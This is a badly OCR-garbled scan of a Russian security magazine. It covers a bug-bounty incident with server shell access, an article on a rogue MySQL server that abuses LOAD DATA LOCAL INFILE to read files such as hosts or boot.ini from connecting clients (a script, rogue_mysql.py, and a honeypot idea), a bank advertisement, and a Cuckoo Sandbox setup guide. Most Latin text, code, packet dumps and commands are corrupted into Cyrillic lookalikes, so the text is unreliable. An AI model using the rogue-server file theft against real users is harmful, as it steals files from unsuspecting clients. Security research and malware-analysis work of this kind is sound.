система аутентификации в Зопу Ещецаттет 
Ме\могк построена на З{ищ5$2, как и один из сер- 
висов Арре — ехргезз!апе.арре.сот. Ребята 
(особенно из «Эппл») были уже не понаслышке 
знакомы с этой начавшейся волной атак. Они 
быстренько замутили хотфикс, и поэтому китай- 
ский эксплойт не работает (сделали это в райо- 
не 18-19-го числа). Надо сказать, мы удачно до- 
гадались проверить, что эксплойт работает еще 
ив РОЗТ. Поэтому наш хотфикс это учитывал, зато 
ребята из «Сони» и «Эппл» не додумались и в ито- 
ге опять оказались уязвимы. Тем не менее после 
моего репорта им и $опу, и Арре отреагировали 
на репорт в течение десяти часов; это говорит 
о том, что люди там есть, а пропустить менее 
стандартный вектор атаки и слишком довериться 
инструменту защиты, будь то \М/аЁ или 1Р$, может 
каждый. 


Ще < ар си вн 


(1060) Вхо х [Л Диалоги х \ |: }епм 


Уошг заррой: Ш 15: 2956166732347434683 
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ТЬе гедиее4 ОВГ. ууаз гедесе4. Реазе сопзий уу уошг афише га!юг. 


И опять $Ве!-доступ на сервере Арр/е. Банально 


ВЫВОДЫ 

Скорость и качество реакции на событие в кон- 
тексте современных угроз достаточно важный 
элемент. Как видно из примеров, тебя не спасет 
модная железка, тебя не спасут стандарты РС! 
0$$ или 150, умный С!$О не поможет и талант- 
ливый админ не успеет. Однако такая мелочь, 
как багбаунти, может неожиданно прокнуть! Или 
сотрудники компании, которые понимают, что та- 
кое хакеры и как ломать, вовремя просекут фиш- 
ку и успеют предупредить угрозу в реальной сре- 
де с реальными данными. Это люди, это процесс 
(например, можно провести инвентаризацию 
стека ПО и анализировать каждый вышедший 
апдейт, хотя для больших компаний это не вари- 
ант). Есть разные пути решения, и даже в гонке, 
где каждый день на счету и кажется, что успеть 
нельзя, при хорошей 5есищу/гезроп5е-команде 
можно отбиться. Нужна ли вам такая команда 
или достаточно С!ЗО-блогера — решать, конеч- 
но, бизнесу. 

Моя мысль проста: озаботиться регулятора- 
ми, бумажками, рисками и забить на инженер- 
ные дела — это провал ИБ, но, к сожалению, сей- 
час индустрия движется именно в эту сторону, 
особенно в РФ, и в твоих силах попытаться из- 


== 


менить это :). = 


= 


Эксплойтне прошел, 
придется чуть-чуть по- 
хитрить... 


и 

Зпе!-доступ насер- 
вере $опу. Я побывал 
там, где когда-то были 


анонимусы. Романтика 


Где 51 
та | рагате | Мезбеге | Вх 

=ы.ВЕЕЗО? ИТТР/1. 1 
Вое = дАЗОСИЛЕИЕ . ЗРЕЛуЧИИЕ еНЕТЕ А РИН ТИС РНЕ ЛИСЕ И, ОА 


Иссерт-=Гагстрасе: е0=15,е1019=0.8 
ссоре =Ерсо т: ЧЕфр, Чее1аее 
Сори се а: Ира 1%^> 


Таее- Арене: МозЕ1 а 9.0 Уи аоуо НТ Е.Е; МОМЕЯ: Ем:18.0 Обзеко’г Ото | 
АссЕрЕ: СЕНЕ / ВЕ, рр ьсаелем/ нк Бета -+кш , ар са вом ше. 6, "7 Де. 0 


тай ЕВА ТТ ОА бал 1 ТЕ 61 ЕСА Е 1 бе ел ВОТ Е 24257376425 таке сы 
шт = Аж АЯ ЕЛА ЧА ВУДС АЕ ББ ЯЧА БРА ПА5ы 


гаи’ | пезоыне | пех 

НТТРИ Ц. 200 Е — 

РАБ: Уёа, 54 чыЕ 2011 16:24:20 СИТ 
Беер-АШ ме: Ерино не 15, вах 100 
СошесеЬеы: Наер-АЛ а 

Сопсепт-Туре: сеегр1а1т; спагвес"ИТР-@ 


Сор епе=Ьеноев: $0004 


[жа 15 ЕтнеНАИЕ СТ СКО АЕ НИ ОГЕЧС ОДНА СО еее 9 


Зес=боокфе; ОЗЕЗЗТОН Ио СЕО т ЕАО 45915, 1мр-р1-оротст04-2309; Расне/; Зесисе;: Вссров\у 


ЗЕЕ=сеОе ее ТЕТЕ еее Тесей ЕТ 1 ПТО сей ЕВ лает баба Те рее: Ракнег 


Ракебох! 18.0 


У\УАВММС 


Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности залюбой 
возможный вред, при- 
чиненный материалами 
данной статьи. 
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КРАТКОЕ СОДЕРЖАНИЕ 

ДЛЯСАМЫХ НЕТЕРПЕЛИВЫХ 

Теплый июньский день перед выходным. Ничто 
не предвещало белы, итутнекто Денис Баранов 
совместно с Михаилом Фирстовым и Алексеем 
Осиповым находят0-Чдау-фичу в реализации 
5ОЕ-оператора ОАБВ РАТАТОСАЕИМЕЕЕ и пишут 
под нее сплоит. 


ТЕПЕРЬ ПО ПОРЯДКУ 

Все началось с того, что в Сети обнаружился за- 
бавный хак-квест. В одном из уровней необхо- 
димо было влиять на строку соединения к базе 
данных. Идея понятная: если подменить адрес 
СУБД, то МузО!-клиент подключится не к серве- 
ру разработчика, а к серверу, контролируемому 
хакером. А значит, для обхода авторизации до- 
статочно поднять свой МузО!-сервер и подме- 
нить таблицу с пользователями на свою. Тема не 
новая: подробнее об атаках с изменением строки 
соединения можно прочитать, к примеру, на гас1. 


База данных — лакомый кусочек для хакера. Но атакующий в погоне за информа- 
цией в СУБД сам может стать жертвой. Из-за лазейки, оставленной разработчиком, 
клиент вместо того, чтобы прочитать данные из базы, сам того не подозревая, может 
передать на сервер произвольный файл со своей системы! Как такое может быть? 
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Боевой хонипот из базы данных 
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пы а ЕЬЫ ЕН ТСР Мы 2. Сервер отвечает нам неким пакетом, содер- 
*0.90555190192.108.12 —92.108.127.128 му5ен 145 ведет дчцегу жащим имя файла, которое было передано 
5.0.00366300152.168.127.128 192. 168.127.2 Муз == 96 кезропзе ТАВИСА И 
6 0. 00371600 192.168.127.2 192.168.127.128 ТСР 54 32567 > ту$41 [. 3. Клиент отправляет содержимое файла на сер- 
7 0. 00387500 192.168.127.2 192.168.127.128 Му50ь 886 вециезт [ма ]КРогт! вер. 
8 0.00597600 192.168.127.128 192.168.127.2 Му$5Ое 114 лезропзе ок 


Странное поведение, не находишь? Сразу 


‚ате 4: 148 Бусез оп \1ге (1184 6115), 148 Ё 
Пегпет тт, $гс: Мимаге_еб:8е:75 (00:50:56:е6 5 
тегпет Рготосо1 Мег51оп 4, $гс: 192.168.127. 


ап5т15$510п СОПТГО] РГОТОСОТ, 
ОС РГОТОСО] 
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5ГгС РОГТ; 32567 (3 


За 75 08 06 


бросается в глаза, что всю эту последователь- 
ность можно сократить до одного шага — шага но- 
мер 3. Почуяв неладное, мы решили разобраться. 
И немного заморочившись с настройками прок- 
сирования, получили неожиданный результат. 
Если на произвольный запрос Му5О!-клиента 


гРас 


сартигей (1184 6115) оп 
75), О5т: Мимаге_е2:9с: :04 
92.168.127.2), 05т: 192. от 
567), О5Т РОГТ: ту$4] (3306), $5= 


вез 


45 00 . о _ м № м) 
7 02 с0 а8 мы отправим пакет #2, клиент сразу отправит нам 
9е 21 содержимое файла независимо от того, какой из- 
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завее ..2. 
РАТА ГОС АС 
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ТМЕТЕ 
У пом | 
тетз2 г уег 
-`хезтс\\ По$т$' 
› ТАВЬ Е ТУу541 


начально был запрос! 
Сервер просит файл? Дадим ему файл! 


ПРОЧТИ ФАЙЛ! ПОЖАЛУЙСТА 
В срочном порядке был набросан небольшой 
сплоит на питоне с гордым названием годие_ 


Клиентотправляет запрос насервер #1 


ога (0(.1у/14гУОА9). Но появилась идея: если че- 
ловек сам соединяется с твоим сервером, почему 
бы не найти вариант получения доступа к хосту, 
с которого он осуществляет соединение? 

Есть идея — нужно пробовать! На ум сра- 
зу пришел замечательный оператор ГОАО РАТА 
ГОСАЕ, который позволяет пользователю базы 
данных считать файлы со своей локальной систе- 
мы и отправить их на сервер базы данных. Удоб- 
ная функция, чтобы не приходилось писать скрип- 
ты или загружать файлы на сервер. И более того, 
она не требует повышенных привилегий, так как 
считается, что клиент читает собственные файлы. 
Найти бы вариант выполнить команду ГОАО ВАТА 
ГОСАЕ1МЕШЕ, причем без желания клиента. 

В первую очередь изучаем материалы по 
теме, например на гао{.ога (01.1 Ч7\/м). По- 
мимо описанных трюков, также можно попробо- 
вать поиграться с триггерами, но в случае заец- 
запросов они бесполезны. 

В итоге для решения задачи нужно предста- 
вить себе логику программиста, разрабатываю- 
щего СУБД. Для того чтобы выполнить запрос, 
его необходимо распарсить. После этого можно 
выполнить нужные команды и отдать данные кли- 
енту. Соответственно, запрос с оператором ГОАБВ 
ОАТАТОСАЕ тоже должен где-нибудь разобраться. 
Варианта всего два: на сервере или на клиенте, но 
второй случай мы сразу отбрасываем, так как это 
было бы абсолютно неправильно с точки зрения 
архитектуры. Значит, оператор все-таки обраба- 
тывается на сервере, после чего клиенту, видимо, 
отправляет служебное сообщение «Отдай мне 
файл с таким-то именем». Клиент получает со- 
общение и отдает запрошенные данные серверу. 

А теперь самое главное! А что, если на любой 
О! -запрос от клиента отвечать служебным со- 
общением «Отдай мне файл»? :) 


ПРАКТИКА 

В обычном случае взаимодействие с БД выгля- 

дит так: мы авторизуемся -› если авторизация 

успешна, отправляем запрос -—› получаем ре- 
зультат. Последние два пункта можно повторять 
сколько угодно раз. Однако для ГОАВ БРАТА (ОСАЕ 

|МЕШЕ все немного иначе. Обрати внимание на Р- 

адреса и порты, с которых приходят запросы: 

1. Предположим, мы уже авторизованы и по- 
сылаем запрос ГОА РАТА ГОСАЁЕ1МЕШЕ "С`\\ 
\ММпао\м\\зует32\\апуегэ\\вс\\По${5" МТО 
ТАВЕЕ туза! е$. 


В результате простейший скрипт на Рупоп’е, 
выдающий себя за Му$ОТ-сервер, может про- 
читать любой файл с подключающего клиента. 
Разве это не прекрасно? 
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Ответсерверана запрос (ОАО ВАТА ОСА #2 
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Контент файлалетит насервер #3 
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Бит, говорящий о возможности использования ГОАО ОАТА ОСАЕ. 


пу$а1. Весь его функционал заключался в том, 

что он принимает подключения от Му5ОИ- 

клиента (причем неважно, какой логин и пароль 

используется для подключения) и на любой за- 

прос клиента отправляет запрос на чтение опре- 

деленного файла. Общение выглядит следую- 

щим образом: 

1. Клиент выполняет запрос ЗЕТЕСТ * ЕАОМ 
пуза[.изег (1). 

2. Сервер отвечает: «А прочитай-ка лучше свой 
файл с:/Боот.ть (2). 

3. Прочитать файл? Ну лааадно, держи (3). 


В результате простейший скрипт на РУПоп’е, 
выдающий себя за Му5ОЕ-сервер, может прочи- 
тать любой файл с подключающего клиента (как 
в данном случае бос{.1т!). Разве это не прекрасно? 


1МТНЕ МПЕО 

Способ запуска: рупоп годие туза.ру. По де- 
фолту читается случайный файл из списка в са- 
мом начале скрипта. 

Где может пригодиться? К примеру, теперь 
могут пригодиться установочные скрипты ворд- 
пресса или рирМуАадтт с нерабочими базами 
МузО(Е. Обращаемся на наш сервер и получаем 
полноценную читалку файлов в контексте уязви- 
мого клиента. Ниже представлен небольшой при- 
мер для наглядности: 


_ ($ СЕТ[  'ту$91_По5_рог*' ],=_ 
'"гоое', "12345'); 
туза1_ачегу("5ЕЪЕСТ * «= 
РЕКОМ ту$41.чзег'); 

?> 


Или другой вариант: можно реализовать 
небольшой Попеуроф, в котором файлы будут 
читаться с сервера брутера/атакующего. Это 
вообще может получиться забавный экспери- 
мент с интересными результатами. Так, оста- 
вив работающим скрипт годие_ту$а1.ру, мы 
насобирали порядочное количество файлов 
по${$, принадлежащих нашим серверам, с ко- 
торых мы тестировали брутфорс :). 


НЕМНОГО ДЕГТЯ 

Уязвимость интересная, но, к сожалению (или 
к счастью?), не все МуЗ@ОЁ-клиенты по умол- 
чанию собраны с флагом, отвечающим за воз- 
можность исполнения функционала ГОАВ ВАТА 
[ОСАЁЕ. Это серьезное ограничение (парни 
сильно расстроились, когда так и не смогли 
пробить ни мой СЧ-клиент на Мас’е, ни стан- 
дартный МузО!-клиент, запущенный на Убипти; 
видимо, в гости в офис РТ больше не пустят. — 
Прим. главреда). 

Выяснить, поддерживает ли клиент этот функ- 
ционал или нет, можно по данным первого пакета, 
пришедшего серверу от клиента, в секции Зегуег 
Сгее!поа. Пример данных из такого пакета пред- 


<?рпр — | ОИ 
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Файл атакующего 


Естественно, эту особенность клиентов 
МуЗОЕ вполне можно использовать при 
МИМ-атаках в процессе проведения 
тестирования на проникновение. Не надо 
ждать, пока клиент сам выполнит опе- 
ратор (ОАБ ВРАТА 1ОСАЕ, — достаточно 
просто оказаться между ним и серве- 
ром :). Агез$, автор тулкита Итегсерег 

( ), заинтересовался 
нашей находкой и с радостью добавил 
функционал для реализации подобной 
атаки. Официально эта функция станет 
доступной после релиза нового билда. 
Но если не терпится, ты всегда можешь 
попросить у автора сборку, включающую 
в себя этот новый функционал. 


Новый функционал в Итегсерег-МС 


ВМЕСТО ЗАКЛЮЧЕНИЯ 

По правде говоря, оператор 1ОАБ ВРАТА 
[ОСАЁ — это уже сама по себе интересная шту- 
ка, которая не раз помогала нам при проведе- 
нии тестов на проникновения, еще до момента, 
когда мы нашли возможность для выполнения 
обратной атаки. 

Немного покопавшись в документации, мы 
обнаружили, что разработчики частично в курсе 
этой особенности. Так, на официальном сайте 
сказано, что теоретически между клиентом и 
сервером МузЗОЕ может вмешаться третье лицо и 
модифицировать запрос ГОАО ВАТА ГОСАЕ, в ре- 
зультате в базу будет записан совершенно другой 
файл. Но такая ситуация маловероятна. А вот что 
действительно реально, так это описанная сегод- 
ня концепция хонипота. 

Как ты видишь, тема атаки на клиенты со сто- 
роны сервера на данный момент раскрыта не пол- 
ностью. И вполне реально обнаружить подобные 
забавные особенности и для других сервисов, 
доступных по другим портам. Помни, хакер: под- 
ключился к чужому серверу — будь осторожен! 
Атаковать тебя может и легальный владелец ре- 
сурса! = 
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интернет-банка «Альфа-Клик» 


Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях. 
ОАО «Альфа-Банка», а также заказав по телефонам: 


8 (495) 788-88-78 в Москве | 8-800-2000-000 в регионах России (звонок бесплатный) 
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Алексей Карябкин, 
аналитик безопасност 
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В ДЕЛЕ 


НАЗНАЧЕНИЕ 
Сискоо Запабох — автоматизированная опенсорсная система анализа вре- 
доносного ПО (для простоты будем называть ее просто «кукушка»). Кукушка 
представляет собой песочницу с инструментарием, позволяющим автомати- 
чески запускать в ней файлы и анализировать их поведение, атакже отслежи- 
вать состояния системы (песочницы) и протекающие в ней процессы. 

Термин «песочница» определяет изолированную виртуальную среду, 
предназначенную для тестирования кода или ненадежного ПО. На практике 
песочница используется для динамического анализа потенциально вредо- 
носных файлов. Ценность такого подхода, в отличие от статического, заклю- 
чается в получении важной информации о зловреде: 

какие ресурсы используются (как локальные, так и внешние); 

какие применяются методы обхода средств защиты; 

какие уязвимости эксплуатируются. 


ФУНКЦИОНАЛЬНЫЕ ВОЗМОЖНОСТИ 
Сискоо Запарох разработана на РуПоп’е с использованием модульного раз- 
деления задач. В качестве изолированной виртуальной среды для анализа 
потенциальных вредоносов кукушка позволяет использовать следующее 
ПО виртуализации: К\М, УтиаВох, /М\маге. 

Изначально авторы предполагали в качестве гостевой операционной си- 
стемы в виртуальной среде использовать Мсго5ой \Мтаомз ХР $Р3З. Видимо, 
это связано с популярностью именно этой операционной системы и, соответ- 


0: `Чече1ор\сискоо _0_5\сисКоо>сисКоо -ру 


КУКУШКА 


53 


Вирусная аналитика — очень 
познавательное и занима- 
тельное занятие, особенно 
поиск и исследование све- 
жих семплов вредоносов. 

В корпоративной сети де- 
лать это вручную достаточно 
трудоемко и отнимает много 
рабочего времени. Я рас- 
скажу, как автоматизировать 
этот процесс с помощью 
Сискоо Запабох и повысить 
эффективность антивирус- 
ной защиты в компании. 


ственно, с существующим многообразием многофункционального вредонос- 
ного ПО для этой платформы. Однако при тестировании выяснилось, что во- 
преки предположениям кукушка оказалась работоспособной в ОС МИпдом$ 
\М$а и М/паом/$ 7, а также О$ Х. В качестве основной ОС (хост-системы) раз- 
работчики рекомендуют платформу @МУ/Ипих. 

Итак, как я уже сказал, СискКоо Запарох умеет анализировать файлы и по- 
зволяет получить следующие типы отчетов о проверке: 

перечень вызываемых функций \М/т32 АР! всеми процессами, порожден- 

ными зловредом; 

перечень файлов, которые были загружены, созданы, удалены или к кото- 

рым происходило обращение во время работы зловреда; 

дамп памяти потенциально вредоносных процессов; 

логирование сетевого трафика в формате РСАР; 

скриншоты рабочего стола, сделанные во время выполнения малвари; 

полный дамп памяти виртуальной машины; 

результат проверки файла на \Мги$Тота! (угизтота!.сот). 


Кукушка может быть использована для анализа исполняемых файлов 
ОС семейства \М/Ипао\м$ и динамических библиотек (*.41), документов в фор- 
мате РОЕ и Мсгозо О се, ЧА -ссылок и РНР-скриптов. Благодаря своей 
модульности, этот инструмент предоставляет тебе широкие возможности 
для создания собственных скриптов и конфигурации аналитической системы 
вредоносов. 
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Рис. 2. Результат отправки файлана проверку 


РАЗВЕРТЫВАНИЕ И НАСТРОЙКА КУКУШКИ 

Для развертывания Сискоо Запабох тебе понадобится следующее ПО: 
. дистрибутив РУПоп (2.7); 

. ЗОАспету (0.7.10); 

. дистрибутив кукушки; 

. дистрибутив виртуальной среды (К\М, Ущиа!Вох или УМ\маге); 

. утилита{сраитр для анализа сетевого трафика. 


А также дополнительные компоненты, которые рекомендуют разработчики: 

Орк (обязателен для установки): требуется для извлечения необходи- 
мой информации из сетевых пакетов; 

. Уи]а2 (обязателен для установки): требуется для отображения веб- 
интерфейса и НТМ!-отчетов; 

. Маас (дополнительно): требуется для идентификации формата прове- 
ряемого файла; 

. Руадеер (дополнительно): требуется для вычисления нечетких хешей; 

. Рутопдо (дополнительно): требуется, если используется база данных 
МопдорВ вместо стандартной; 

. \Уага и Уага РУПоп (дополнительно): требуется для сравнения Уага- 
сигнатур (лучше использовать $уп-версию); 

‚  ЦШОма (дополнительно): требуется в случае использования менеджера 
виртуальных машин К\/М; 

. ВоШеру (дополнительно): требуется для использования утилиты мер.ру 
и ар!.ру (директория и 5$, в составе дистрибутива кукушки); 

. Рене (дополнительно): требуется для выполнения статического анализа 
бинарных файлов РЕЗ2; 

. РУПоп|таде МШбгагу (дополнительно): требуется для снятия скриншотов 
рабочего стола (виртуальная среда), в процессе анализа зловреда. 
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Рис. 3. Сформированный отчет проверки в формате НТМЕ. 


Замечу, что при установке дополнительных компонентов тебе потре- 
буется иметь предустановленные пакеты для РУПоп’а: МаткирЗаЕ-0. 18, 
заироо[5-0.9.6. Как отмечено выше, авторы кукушки рекомендуют использо- 
вать в качестве основной ОС (хост-системы) платформу @МУ/Мпих. По опре- 
деленным причинам я мог использовать только компьютер с предустанов- 
ленной ОС семейства \\тао\м$. Поэтому, идя вразрез с рекомендациями, 
я решил использовать \\ММпао\м$ ХР $Р3З. И это решение создало мне немало 
трудностей (пришедших в негодность две клавиатуры и одного мыша), пока 
я успешно не запустил эту песочницу. Для себя в очередной раз сделал вы- 
вод — по возможности лучше прислушиваться к рекомендациям. 

В целом, следуя официальной инструкции Сискоо Запабох Воок ( 

) (офлайн-версия лежит в каталоге сисКоо\аос$з\Боок), развернуть 
и настроить кукушку не составит особого труда, особенно если ты будешь 
разворачивать ее на Ипих. Я лишь кратко укажу самые важные моменты. 

Все конфигурационные файлы Сискоо Запабох расположены в папке 
Сискоо\соп+\. В файле сисКоо. соп+ производятся основные настройки рабо- 
ты аналитической системы. В нем необходимо указать !Р-адрес ПК, на кото- 
ром будет запущена сискоо. Крометого, при использовании функции анализа 
сетевого трафика необходимо указать путь расположения утилиты 1сраитр. 
ехе, а также идентификатор сетевого устройства, которое будет прослуши- 
ваться. В данном случае лучше всего использовать сетевое устройство вир- 
туальной машины, чтобы однозначно определять принадлежность трафика. 
Для получения списка идентификаторов сетевых устройств (в \МИпдом/$) мож- 
но воспользоваться той же утилитой {сраитр с параметром -Б. 

В ргосе$$1п=.соп+ настраивается обработка полученной информации. 
В нем ты можешь определить, какую категорию получаемой информации не- 
обходимо обрабатывать. А в файле герогЕ1пт?. соп+ нужно выбрать, в каком 
формате формировать отчет о результатах проверки. 


На случай, если ты решишь, как ия, развора- 
чивать кукушку на винде, расскажу, какие труд- 
ности тебя ожидают. Связаны они в основном 
с установкой дополнительных компонентов — 
Мадгс и руаеер. 

Мад!с необходим Сискоо Запарох для опре- 
деления типа файла по его расширению. В офи- 
циальной документации авторы ссылаются 
на ресурс разработчиков (6(.1у/га21В0). Однако 
мне не удалось установить этот пакет, так 
как он требовал компиляции библиотек. Пробле- 
му установки можно было решить компиляцией 
либо воспользоваться готовыми библиотеками 
(если такие имеются). Я пошел по второму пути. 
Установочный пакет ру{Поп-тадгс и инструкцию 
по установке ты можешь найти тут: БИ.1у/ЛЭТЕЗ. 
Обращаю твое внимание, что для успешной 
установки пакета потребуется скопировать 
в системную папку С: \И1пдом$ \5уз{ет32 три 


динамические библиотеки: тад!с1.а!, 2161. 
ай, гедех2.а!. Ссылки для скачивания найдешь 
на той же странице. 

Компонент рудеер, или $заеер (у меня 
был з5аеер-2.9-0.3), используется кукушкой 
для вычисления Т7гу-хешей (нечетких хешей). 
Это очень распространенный метод для иден- 
тификации неидентичных объектов. Применим, 
например, в аналитике вредоносов, для об- 
наружения различных сборок одного и того 
же класса. К сожалению, для $5аеер я готовых 
библиотек не нашел. Поэтому пришлось ком- 
пилировать самому. Нагуглил только рекомен- 
дацию, что для сборки библиотеки под МИп9о\м$ 
необходимо установить РУПоп 2.7 (или выше), 
компилятор ССС (МтС\/\/) и СУПоп. 

РУПоп уже установлен, качаем МтС\\/ 
и СУПоп. Так как для установки СУПоп’а тоже 
требуется компиляция библиотек, сперва уста- 
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Рис. 4. Отправка файлана проверку из консоли 


НАСТРОЙКА ВИРТУАЛЬНОЙ СРЕДЫ 

Создание виртуальной среды для проверки потенциальных вредоносов — 
процесс творческий, нужно сделать ее максимально похожей на реальную 
компьютерную систему, в которой работает пользователь. Это позволит тебе 
получить наилучший результат при анализе файлов. 

При настройке виртуальной среды сетевое взаимодействие с виртуаль- 
ной машиной необходимо настроить как сетевой мост. Заранее определи 
|Р-адрес(а), который(е) будет использовать виртуальная машина при ручной 
настройке сетевого интерфейса. А также отключи брандмауэр и центр обнов- 
ления. 

Если планируется использовать одноранговую сеть, необходимо задать 
пароль для учетки локального пользователя виртуальной машины (настройка 
ОС) и создать локального пользователя в основной системе с таким же име- 
нем и паролем (применительно для \\Мтпаом5). 

Кроме того, на виртуальной машине нужно установить дополнительное 
ПО в соответствии с типами файлов, которые планируешь проверять в вир- 
туальной среде. 

После того как завершишь настройку виртуальной среды, не забудь со- 
хранить ее состояние и сделать клон виртуальной машины (на всякий случай). 
Как — подробно описано в официальной инструкции ( ). 

Затем в конфигурационном файле <«тасптетападег>.сопт, который 
определяет настройки работы виртуальной среды, тебе потребуется указать 
перечень используемых виртуальных машин, режим запуска виртуальной 
среды, |Р-адреса и другое. 

После чего самое время проверить работоспособность кукушки. Для это- 
го тебе потребуется выполнить скрипт сисКоо .ру, который расположен в кор- 


навливаем МтСМ\/. Замечу, что после установки 
компилятора стоит проверить переменные 
среды, а точнее наличие в переменной РАТН 
строки с: \т1пём\61т. Если нет — дописываем 
и перезагружаемся. 


Но это не все. 


в классах Сузм1пССотр11ег (Уп1хССотр11ег) 
и М1пм32ССотр11ег (Суём1пССотр11ег), после 
чего можно приступить к установке СУпПоп. на 


Выполнив все необходимые для этого требо- 


Е11е ''0:\поберай.ехе' аД4е аз вазК ылЕН 1. 20 


не каталога сисКоо. Результат успешного выполнения скрипта изображен 
на рис. 1. Если при запуске кукушки выдается сообщение об ошибке, еще раз 
убедись, все ли необходимые компоненты были установлены, и проверь кон- 
фигурационные файлы. 


ПРОВЕРКА ФАЙЛОВ 

Чтобы выполнить проверку файла в виртуальной среде Сискоо, ты можешь 
воспользоваться веб-интерфейсом, который запускается скриптом меб .ру, 
расположенным в каталоге сисКоо\и*11$. 

В браузере перейди по адресу Ир: //127.0.0.1:8080. В форме выбери 
файл, который требуется проверить. Установи приоритет и дополнительные 
опции — и файл готов к отправке на проверку в песочницу. 

С описанием параметров и опций проверки файла можешь ознакомиться 
здесь: либо 

При успешной отправке файла система сообщит тебе идентификатор за- 
дачи и ссылку на задачу, где ты сможешь просмотреть результат проверки 
(рис. 2). По окончании анализа файла в виртуальной среде в зависимости 
от настроек аналитическая система сформирует отчет, который станет до- 
ступным для просмотра. 

Помимо веб-формы, для отправки файла или ссылки на проверку в песоч- 
нице ты можешь использовать скрипт зибт1{.ру из сисКоо\и{11$. Принцип 
использования скрипта схож с веб-формой. Также в качестве входных пара- 
метров необходимо указать параметры и опции проверки файла (рис. 4). 

Во время отправки файла или ссылки на проверку для формируемой за- 
дачи кукушка создает профиль с именем идентификатора задачи. Профиль 
создается в каталоге сисКоо\$фогаве\апа1у$ез\ (рис. 5). 


(са з54еер && ./сопйвиге && таке 


са $°аее 


&& °П сопйриге && таке), 


Далее необходимо сообщить РУпог’у, 
что для компиляции будем использовать ком- 
пилятор МтС\М. Для этого переходим в каталог 
РуЕВоп27\116\91$%и%11$\. Создаем в нем конфи- 
гурационный файл 41$%и{115$ . с+в (изначально его 
там нет) и записываем в него следующие строки: 


[6и11а] | 
сотр11ег = т1пм32. 


Также немного скорректируем файл 
суём1пссотр11Тег.ру, который расположен 
в том же каталоге. В нем надо закомментиро- 
вать вызов метода $5е1+.5е{ ехесифаБ1е$(...) 


вания, я приступил к установке $5аеер. Но и тут 
без подводных камней не обошлось. Во время 
компиляции установочный скрипт 5ефир.ру 
(ззаеер) в командной консоли \\/тао\м$ пытается 
выполнить команду ./сопйдиге && таке. И по- 
нятное дело, вылетает ошибка — командный 
интерпретатор не знает такой команды. 

Что ж, раз уж пошла такая пьянка, давай уста- 
навливать Судмлт. При установке Судмит также 
необходимо выбрать дополнительный пакет 
таке. После установки Судмит нужно отредакти- 
ровать установочный скрипт 5ефир.ру ($$аеер): 
в классе с1а55 Ви11аАЕхЕеп$1оп(Би11а_ехе. 
бБи114_ех®е) изменить строку 


потому что Суд\уип тоже не понимает . /. 

Далее нужно запустить консоль Суодм/п, 
перейти в каталог 554еер-2.9-0.3\$5$4еер\ 
и выполнить команду 


5И сопйвиге && таке 


И только после ее успешного выполнения 
в командной консоли \М/Лпао\/$ можно выполнить 
скрипт установки 5ефир.ру 1п$Та11 ($заеер). 
Почему необходимы такие танцы с бубном, 
я не совсем понимаю, но только так компонент 
ззаеер устанавливается успешно. 


56 Взлом 


В результате выполнения проверки в профиле задачи сохраняется вся ин- 
формация, полученная при анализе файла или ссылки в виртуальной среде 
Сискоо Запарох. Это скриншоты активных окон, состояние системы, файлы, 
перехваченный трафик, результаты проводимого анализа и отчеты. 


АВТОМАТИЗАЦИЯ ПОИСКА И АНАЛИЗА ПОТЕНЦИАЛЬНО 

ВРЕДОНОСНЫХ ФАИЛОВ 

Для создания автоматической системы поиска и анализа малвари необходи- 

мо решить следующие задачи: 

1. Организовать автоматизированный поиск потенциальных вредоносов 
на корпоративных ПК. 

2. Определить правила поиска и возможность их расширения. 

3. Обеспечить сбор и учет найденных потенциальных вредоносов в «храни- 
лище». 

4. Организовать автоматическое сканирование хранилища на предмет появ- 
ления новых необработанных (непроверенных) файлов и их запуск на про- 
верку в виртуальной среде. 

5. Организовать удаленное управление и просмотр результатов работы. 


ПРИНЦИП РАБОТЫ 

Как уже было сказано, наша цель — построить автоматизированную систему 
поиска и анализа потенциальных зловредов в корпоративной сети. Эта си- 
стема состоит из двух частей: сервера поиска файлов (собирает и хранит их) 
и сервера анализа найденных файлов. 

Настроенный сервер сканирования ведет постоянный (либо по расписа- 
нию) поиск на корпоративных ПК потенциальных вредоносов в соответствии 
с определенными параметрами. При выявлении подобных файлов они пере- 
носятся в хранилище на сервере приложений (зуЗет-По$. Система авто- 
матического анализа файлов на сервере приложений (зу$ет-По${) отсле- 
живает состояние хранилища и при появлении новых файлов помещает их 
в очередь для анализа в виртуальной среде. По завершении проверки каждо- 
го файла в базе данных создается отчет, который можно просмотреть через 
веб-форму на сервере приложений. 

Предполагаемая схема построения автоматизированной системы поиска 
и анализа потенциальных вредоносов изображена на рис. 7. 


ПРАВИЛАПОИСКА 

В корпоративной сети ПК представляет собой динамическую систему, ко- 
торая все время изменяется. Пользователь постоянно запускает различные 
приложения, открывает и создает файлы, посещает интернет-ресурсы, в ре- 
зультате чего в системе появляются новые файлы. 

При анализе состояния компьютерной системы невозможно заранее 
знать, скомпрометирована ли система, а при поиске потенциальных вредо- 
носов — какой из файлов представляет угрозу. Поэтому сначала необходимо 
определиться с признаками заражения ПК и классификацией файлов, благо- 
даря чему станет возможным относить файлы к категории представляющих 
потенциальную угрозу. К таким признакам можно отнести: 

. наименование файлов (или папок), как полное соответствие имени (на- 
пример, каталог эуз+етНо$*+, признак заражения трояном ЗруЕуе), так 

и по определенной маске (]аг_*Атр, хкКпаам», 0.* и тому подобные); 

. расширения файлов (*.ехе, *.а1Й, *.с!а$$, * {аг/*.}аа, *.раРи так далее); 
. пути поиска. 


В качестве путей поиска нужно брать места, которые чаще всего исполь- 
зуют вредоносы для сохранения своего экземпляра. Это, например, корень 
основного диска, каталог с профилями пользователей, а также директо- 
рии профиля пользователя Ёоса1 $е{{1п8я$, Тетр, $ип\Зауа\БВер1оутепт \ 
саспе\6.0\*, 5фаг%ир и прочие злачные места. 

Это лишь основные признаки потенциально вредоносных файлов. По- 
этому при разработке системы стоит заложить возможность их расширения. 
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Рис. 5. Профили задач 
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Что касается модуля, ответственного за поиск файлов, то он работает по сле- 
дующему алгоритму: 

1. Проверка доступности узла сети (ПК) из определенного диапазона сети. 
2. Поиск файлов, удовлетворяющих определенным признакам. 

3. Копирование найденных файлов в хранилище. 


Приведу основные функции поискового модуля. Доступность хоста опре- 
деляется с помощью функции ТСМР АРТ Тстр$епаЕспо. Для использования 
данной АР!-функции необходимо определить структуру данных 1р_ор*1оп_ 
1пфогта*1оп (представляет собой информацию о [Р-пакете), а также структу- 
